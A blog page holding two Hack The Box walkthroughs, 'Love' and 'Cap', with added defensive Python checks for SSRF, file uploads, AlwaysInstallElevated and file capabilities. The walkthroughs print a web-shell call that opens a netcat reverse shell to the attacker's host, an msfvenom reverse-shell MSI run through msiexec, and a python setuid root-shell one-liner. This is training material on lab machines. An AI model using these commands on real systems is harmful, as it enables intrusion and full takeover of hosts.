Sunday, August 8, 2021

Love | Hack The Box (HTB) | CTF Walkthrough

Welcome back! Let's continue our exploration of Hack The Box (HTB) machines. Love is an easy-rated Windows box. With that said, let us begin.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation

  1. Scanning
As usual, let's start with an Nmap scan to learn which services are running on this machine.
Nmap is one of the most popular port scanners; it lets us discover the open ports and the services listening on them.
We have 7 ports open, and the scan also lists two hostnames, "staging.love.htb" and "www.love.htb".

nmap -sC -sV 10.10.10.239

Exhibit 1
  2. Enumeration
First, let's see what is running on port 80. We have a Voting System asking for login credentials, as shown in Exhibit 2 below.

Exhibit 2

Let's enumerate the web server using Dirb. Dirb (and DirBuster) brute-force directory and file names on a web server using wordlists.
Exhibit 3

Wow, there are a whole lot of directories. The /admin directory looks like the admin panel for the Voting System, but we have no admin credentials yet and the default admin passwords do not work. So let us see what the other ports have for us.

When browsing the web service on port 5000, we get a Forbidden response:
Exhibit 4


The Nmap result gave us some interesting hostnames. Let's add them to our /etc/hosts file: the sub-domains are "staging.love.htb" and "www.love.htb", as shown in Exhibit 5 below.

Exhibit 5

Let us visit staging.love.htb. A "Free File Scanner" is hosted on this server, as shown in Exhibit 6 below.
Exhibit 6

We have got a page where we can specify the file URL for it to scan.

Exhibit 7

When we provide a URL and click "Scan file", the server fetches that URL and displays the response it received.

The web service on port 5000 is forbidden to us directly, but maybe we can reach it through the scanner. The File Scanner and the port 5000 service run on the same server, so the scanner should be able to reach it via localhost. We are making the server issue a request to another service on its own machine, which is Server-Side Request Forgery (SSRF).

Exhibit 8

Great! This time the request succeeds, and the response reveals credentials.

User = "admin"
Pass = "@LoveIsInTheAir!!!!"
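The scanner above is vulnerable because it fetches whatever URL the user supplies, including loopback addresses and non-standard ports. The following is an added example (not code from the box or the original write-up) of the validation a server-side fetcher should apply before making the request. The `fake_resolver` and the addresses it returns are constructed so the check runs offline; in production `default_resolver` would be used.

```python
"""Validate URLs submitted to a server-side fetcher so it cannot be pointed at
loopback or internal services (the SSRF shown in the write-up). Added example."""
from __future__ import annotations

import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # a public "file scanner" only needs public web ports


def is_internal_address(ip: str) -> bool:
    """True for loopback, private, link-local, multicast, reserved or
    unspecified addresses, i.e. anything the scanner must never reach."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def default_resolver(host: str) -> list[str]:
    """Resolve host to every A/AAAA record; all answers are checked because a
    hostname may mix a public address with an internal one."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def validate_scan_url(url: str, resolver=default_resolver) -> tuple[bool, str]:
    """Return (ok, reason). The resolver is injectable for offline testing."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # A bare IP literal is checked directly; a hostname is resolved first and
    # every returned address is checked.
    try:
        addresses = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:
            return False, "hostname does not resolve"
    if not addresses:
        return False, "hostname does not resolve"
    for ip in addresses:
        if is_internal_address(ip):
            return False, f"{host} resolves to internal address {ip}"
    return True, "ok"


# Constructed DNS answers (hypothetical hosts and addresses) for offline use.
FAKE_DNS = {
    "public.example": ["1.2.3.4"],
    "rebind.example": ["1.2.3.4", "127.0.0.1"],  # mixed public/internal answer
}


def fake_resolver(host: str) -> list[str]:
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for u in ["http://public.example/file.txt",
              "http://127.0.0.1:5000/",   # the request made in the write-up
              "http://127.0.0.1/",
              "http://rebind.example/",
              "file:///etc/passwd"]:
        print(u, "->", validate_scan_url(u, fake_resolver))
```

Two caveats for a real deployment: the fetcher must re-run this check on every redirect (otherwise a public URL can bounce to localhost), and it should connect to the address it validated rather than resolving the name a second time, so a DNS answer cannot change between check and use.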

I tried these credentials on all the portals we had found and finally got access to the admin dashboard.

Exhibit 9

Exhibit 10

While browsing the admin dashboard, I found that the profile-update option lets us upload a file to the server. How about we try to upload a shell?

Exhibit 11

The shell upload succeeded. The uploaded file can be found in the /images folder.

Exhibit 12

Let's run a simple command, "whoami": the server returns its output.

Exhibit 13
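The upload above worked because the profile-picture handler accepted a .php file under the client's chosen name and stored it in a web-served, script-executing directory. The following is an added example (not the Voting System's code) of the checks that would have stopped it: an extension allowlist, a magic-byte check against the declared type, a random storage name, and storage outside the web root. The sample file contents are constructed.

```python
"""Hardened profile-picture upload check. Added example; the function names,
limits and allowed types are assumptions, not the Voting System's code."""
from __future__ import annotations

import os
import secrets

ALLOWED_TYPES = {
    # extension: (magic-byte prefix, MIME type to serve it with)
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg":  (b"\xff\xd8\xff",      "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff",      "image/jpeg"),
    "gif":  (b"GIF8",              "image/gif"),
}
MAX_BYTES = 2 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def validate_upload(filename: str, content: bytes) -> tuple[str, str]:
    """Return (storage_name, mime_type) or raise UploadRejected.
    The client-supplied name is used only to read the claimed extension; the
    stored name is random, so a name like 'jagskap.php' never reaches disk."""
    if len(content) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename.replace("\\", "/"))
    _, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    magic, mime = ALLOWED_TYPES[ext]
    # The content must match the claimed type: a script renamed to .png fails.
    if not content.startswith(magic):
        raise UploadRejected("content does not match declared image type")
    # Belt and braces against image/script polyglots.
    if b"<?php" in content or b"<script" in content.lower():
        raise UploadRejected("script markers found in image data")
    return f"{secrets.token_hex(16)}.{ext}", mime


def is_rejected(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if validate_upload refuses the file."""
    try:
        validate_upload(filename, content)
    except UploadRejected:
        return True
    return False


def store_upload(filename: str, content: bytes, upload_dir: str) -> tuple[str, str]:
    """Write a validated upload to a directory outside the web root. Files are
    later served by a handler that sets Content-Type from the stored record,
    never by letting the web server execute them."""
    name, mime = validate_upload(filename, content)
    os.makedirs(upload_dir, exist_ok=True)
    path = os.path.join(upload_dir, name)
    with open(path, "wb") as fh:
        fh.write(content)
    return path, mime


# Constructed sample inputs.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
FAKE_SHELL = b"<?php /* constructed stand-in for a web shell */ ?>"

if __name__ == "__main__":
    print(validate_upload("avatar.png", GOOD_PNG))
    for name, data in [("jagskap.php", FAKE_SHELL),
                       ("shell.php.png", FAKE_SHELL),
                       ("polyglot.gif", b"GIF89a" + FAKE_SHELL)]:
        print(name, "rejected:", is_rejected(name, data))
```

The polyglot check can occasionally reject an unusual but legitimate image; the random name and the non-executable storage location are the controls that actually prevent code execution, so the marker check can be dropped where that false-positive rate matters.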

Now it's time for a reverse shell. Let's keep it simple and upload nc.exe to the server the same way we uploaded our shell.

Exhibit 14

As shown in the Exhibit, our file nc.exe has been uploaded.

Exhibit 15

Now we need to set up a listener and execute the below command.

#Netcat Listener
nc -nvlp 8888
#Execute netcat command
http://10.10.10.239/images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe

Exhibit 16

Congrats!! We have a shell as user phoebe and we can read the user flag now.
  4. Privilege Escalation
Let us begin with WinPEAS.

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. Upload the file to the server and just run the binary.

Exhibit 17

This produces a large amount of output; save it to a file for analysis.

The part of the output we are interested in is:

Exhibit 18

We can see that AlwaysInstallElevated is set to 1. This means we can install an MSI package with elevated privileges, as an administrator. This might be our way to administrator on the system.
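From the defender's side, the important detail about this finding is that Windows only honours AlwaysInstallElevated when the value is 1 under both HKLM and HKCU; a single key set to 1 is not enough. The following is an added example (not WinPEAS or anything from the write-up) that parses `reg query` output for the two policy keys and reports whether the machine is in the vulnerable state. The sample output strings are constructed to look like real `reg query` results.

```python
"""Audit helper for the AlwaysInstallElevated finding. Added example; the
policy keys and value name are the real Windows ones, the sample output is
constructed."""
from __future__ import annotations

import re

# Real registry paths; query each with
#   reg query <key> /v AlwaysInstallElevated
HKLM_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer"
HKCU_KEY = r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE = "AlwaysInstallElevated"

# One 'reg query' value line: <name> <REG_TYPE> <data>
_VALUE_LINE = re.compile(r"^[ \t]*(\S+)[ \t]+(REG_\w+)[ \t]+(\S+)[ \t]*$", re.MULTILINE)


def parse_reg_query(output: str) -> dict[str, int]:
    """Parse REG_DWORD value lines of 'reg query' output into {name: int}.
    The 'ERROR: ... unable to find' output for a missing key yields {}."""
    values: dict[str, int] = {}
    for name, kind, data in _VALUE_LINE.findall(output):
        if kind == "REG_DWORD":
            values[name] = int(data, 0)  # reg prints hex, e.g. '0x1'
    return values


def always_install_elevated(hklm_output: str, hkcu_output: str) -> bool:
    """True only when BOTH policy values are 1, the condition under which
    msiexec installs packages with elevated privileges."""
    hklm = parse_reg_query(hklm_output).get(VALUE, 0)
    hkcu = parse_reg_query(hkcu_output).get(VALUE, 0)
    return hklm == 1 and hkcu == 1


def audit(hklm_output: str, hkcu_output: str) -> str:
    """Human-readable verdict for a report."""
    hklm = parse_reg_query(hklm_output).get(VALUE)
    hkcu = parse_reg_query(hkcu_output).get(VALUE)
    state = f"HKLM={hklm if hklm is not None else 'not set'}, HKCU={hkcu if hkcu is not None else 'not set'}"
    if always_install_elevated(hklm_output, hkcu_output):
        return f"VULNERABLE: AlwaysInstallElevated enabled ({state})"
    return f"OK: AlwaysInstallElevated not effective ({state})"


# Constructed sample 'reg query' outputs.
VULN_HKLM = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
VULN_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
MISSING_HKCU = "ERROR: The system was unable to find the specified registry key or value.\n"
DISABLED_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

"""

if __name__ == "__main__":
    print(audit(VULN_HKLM, VULN_HKCU))
    print(audit(VULN_HKLM, MISSING_HKCU))
    print(audit(VULN_HKLM, DISABLED_HKCU))
```

Remediation is to disable the policy "Always install with elevated privileges" under Windows Components > Windows Installer in both the Computer Configuration and User Configuration parts of Group Policy (or set both DWORDs to 0), and to alert on msiexec installs that run as SYSTEM from user-writable paths.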

First, let us create an MSI package that gives us a reverse shell, using "msfvenom".

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.4 LPORT=7777 -f msi -o reverse.msi

Exhibit 19

Now copy/upload the file to the remote box.

Exhibit 20

Let's set up a listener on the specified port and execute the MSI file using the commands below:

# Cross your fingers and listen on netcat
nc -nvlp 7777
# Execute msi file
msiexec /quiet /qn /i reverse.msi

Exhibit 21

BINGO!! We get administrator on the system and can read the root flag.

Exhibit 22

Thus, LOVE from HackTheBox has been rooted.

Thanks for reading this far. I hope you liked it.

Wednesday, August 4, 2021

Cap | Hack The Box (HTB) | CTF Walkthrough

Hi guys!! In this post we cover the HTB machine "Cap", which is rated easy. Capture-the-flag (CTF) challenges can help you understand many aspects of information security; CTF/HTB boxes are full of lessons on new vulnerabilities, RCE, privilege escalation and more.

Contents

1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation


  1. Scanning
The first step is to scan for the ports and services running on the target. One of the most popular port scanners is Nmap, which lets us discover the open ports and the services listening on them. Exhibit 1 shows that ports 21, 22 and 80 are open.

nmap -sC -sV 10.10.10.245

Exhibit 1
  2. Enumeration
The Nmap default scripts (-sC), or a manual login attempt, show that anonymous FTP login is not allowed.

Exhibit 2

Let's run Nikto and Dirb to see if we get any additional information.

Nikto is a command-line vulnerability scanner that checks web servers for dangerous files/CGIs, outdated server software and other problems.

nikto -h http://10.10.10.245/

Exhibit 3

Dirb (and DirBuster) brute-force directory and file names on a web server using wordlists.

dirb http://10.10.10.245

Exhibit 4

The website displays network-monitoring results. In the left sidebar menu there is a "5 second PCAP (packet capture) Analysis" option. PCAP files contain the packets captured from a network.

Exhibit 5

We can also download these files and analyse them later.

Exhibit 6

When browsing http://10.10.10.245/data/4, the application did not show any packets, so I changed the path parameter from 4 to 0.

Exhibit 7

Fortunately, it worked. Had it not, we would have fuzzed the parameter rather than trying values one by one. Let's download the pcap file and open it in Wireshark.

Exhibit 8

Analysing 0.pcap, we can see a username and password: FTP sends credentials in cleartext, so they are readable straight from the capture.
  3. Exploiting
Let's use the credentials we found to log in to FTP. They work, and we can see the user.txt file as well.

Exhibit 9

Let's try to log in to SSH with the same credentials.

ssh nathan@10.10.10.245

Exhibit 10

Congrats! We have user access, and the user's flag is in the home directory.

cat user.txt
  4. Privilege Escalation
Next, while enumerating privilege escalation paths, I found a setuid capability that could give us a root shell. As shown in the Exhibit below, the python3.8 binary on the target has cap_setuid set.

getcap -r / 2>/dev/null

Exhibit 11

If a binary has the Linux CAP_SETUID capability set, or is executed by another binary that has it, it can be used as a backdoor to maintain privileged access by changing its own process UID.
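A defender can catch this class of finding with the same `getcap -r /` command, run as part of a host audit. The following is an added example (not from the write-up or GTFOBins) that parses getcap output in both the older `path = caps+ep` and newer `path caps=ep` formats and flags capabilities that are equivalent to root when granted to a binary any user can run. The sample output is constructed; only the python3.8 line reflects what the box showed.

```python
"""Audit 'getcap -r / 2>/dev/null' output for file capabilities that hand root
to whoever can run the binary. Added example; DANGEROUS_CAPS is the author's
assumption of which capabilities merit a finding."""
from __future__ import annotations

# Capabilities that amount to root on a binary an unprivileged user can run.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}


def parse_getcap_line(line: str) -> tuple[str, set[str]] | None:
    """Return (path, capability names) for one getcap output line, handling
    both output styles:
        old libcap:  /usr/bin/python3.8 = cap_setuid+ep
        new libcap:  /usr/bin/python3.8 cap_setuid=ep"""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        path, _, capstr = line.rpartition(" ")
    if not path or not capstr:
        return None
    caps: set[str] = set()
    for clause in capstr.split():
        # A clause looks like 'cap_a,cap_b+ep' or 'cap_a=ep'; the names come
        # before the first '+' or '=' (the flag letters e/i/p follow it).
        names = clause.replace("=", "+").split("+", 1)[0]
        caps.update(n.strip().lower() for n in names.split(",") if n.strip())
    return path, caps


def audit_getcap(output: str) -> list[tuple[str, list[str]]]:
    """Return a sorted list of (path, dangerous capabilities) findings."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS_CAPS)
        if risky:
            findings.append((path, risky))
    return sorted(findings)


# Constructed sample output; cap_net_raw on ping-like tools is normal.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for path, caps in audit_getcap(SAMPLE_GETCAP):
        print(f"FINDING: {path} has {', '.join(caps)} (remove with: setcap -r {path})")
```

In practice this runs over the output of `getcap -r / 2>/dev/null` collected by a configuration-audit job; the fix on the box would be `setcap -r /usr/bin/python3.8`, since an interpreter never legitimately needs cap_setuid.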

A quick search on the capabilities led to the command to execute for root shell.

# https://gtfobins.github.io/gtfobins/python/#capabilities
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

BINGO!!! As shown in Exhibit 12, executing the above command gives us a root shell.

Exhibit 12


Hope you learned and enjoyed it!!